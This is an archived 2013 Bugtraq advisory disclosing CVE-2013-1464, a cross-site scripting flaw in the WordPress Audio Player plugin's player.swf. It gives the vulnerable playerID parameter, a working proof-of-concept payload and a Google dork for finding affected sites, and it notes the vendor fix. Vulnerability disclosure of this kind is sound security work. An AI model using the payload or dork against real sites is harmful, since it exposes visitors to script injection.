lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 6 Feb 2013 21:52:24 GMT From: hip@...ight-labs.org To: bugtraq@...urityfocus.com Subject: [CVE-2013-1464]Wordpress Audio Player Plugin XSS in SWF‏‏ # Exploit Title: Wordpress Audio Player Plugin XSS in SWF # Release Date: 31/01/13 # Author: hip [Insight-Labs] # Contact: hip@...ight-labs.org | Website: http://insight-labs.org # Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip # Vendor Homepage: http://wpaudioplayer.com/ # Tested on: XPsp3 # Affected version: 2.0.4.6 before # Google Dork: inurl:/wp-content/plugins/audio-player/ #Ref:CVE-2013-1464 ----------------------------------------------------------------------------------------------------------------------- # Introduction: Audio Player is a highly configurable but simple mp3 player for all your audio needs. ------------------------------------------------------------------------------------------------------------------------- # XSS - Proof Of Concept: vulnerable path: /wp-content/plugins/audio-player/assets/player.swf vulnerabile parameter:playerID POC: /wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}// ------------------------------------------------------------------------------------------------------------------------- ------------ Patch: ------------ -- Vendor was notified on the 23/01/2013 -- Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug -------------------------------------------------------------------------------------------------------------------------
Powered by blists - more mailing lists